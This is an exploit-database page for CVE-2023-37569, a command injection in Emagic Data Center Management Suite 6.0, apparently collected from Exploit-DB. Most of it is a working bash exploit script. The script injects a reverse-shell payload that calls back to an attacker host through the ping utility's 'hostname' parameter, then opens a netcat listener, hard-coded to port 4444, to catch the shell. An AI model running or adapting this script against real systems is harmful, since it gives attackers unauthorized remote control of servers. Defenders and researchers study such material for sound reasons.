header-logo
Suggest Exploit
vendor:
Data Center Management Suite
by:
Shubham Pandey & thewhiteh4t
7.5
CVSS
HIGH
OS Command Injection
78
CWE
Product Name: Data Center Management Suite
Affected Version From: 6.0.0
Affected Version To: 6.0.0
Patch Exists: NO
Related CWE: CVE-2023-37569
CPE: a:emagic:data_center_management_suite:6.0.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2023

Emagic Data Center Management Suite v6.0 – OS Command Injection

This exploit allows remote attackers to execute arbitrary commands on the target system by injecting malicious commands through the 'hostname' parameter in the 'ping' utility of the Emagic Data Center Management Suite v6.0. By exploiting this vulnerability, an attacker can gain unauthorized access and control over the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Emagic Data Center Management Suite that addresses the OS Command Injection vulnerability.
Source

Exploit-DB raw data:

#!/bin/bash

# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
# Date: 03-08-2023
# Exploit Author: Shubham Pandey & thewhiteh4t
# Vendor Homepage: https://www.esds.co.in/enlight360
# Version: 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2023-37569

URL=$1
LHOST=$2
LPORT=$3

echo "*****************************"
echo "*  ESDS eMagic 6.0.0 RCE    *"
echo "*  > CVE-2023-37569         *"
echo "*  > Shubham & thewhiteh4t  *"
echo "*****************************"

if [ $# -lt 3 ]; then
    echo """
USAGE :

./exploit.sh http://<IP> <LHOST> <LPORT>
./exploit.sh http://192.168.0.10 192.168.0.20 1337
"""
    exit 1
fi

url="$1/index.php/monitor/operations/utilities/"

echo "[+] URL   : $URL"
echo "[+] LHOST : $LHOST"
echo "[+] LPORT : $LPORT"
echo

payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"

post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"

echo "[!] Triggering exploit..."

echo $url

(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &

echo "[+] Catching shell..."
nc -lvp 4444

Navigation

Suggest Exploit

Services By CQR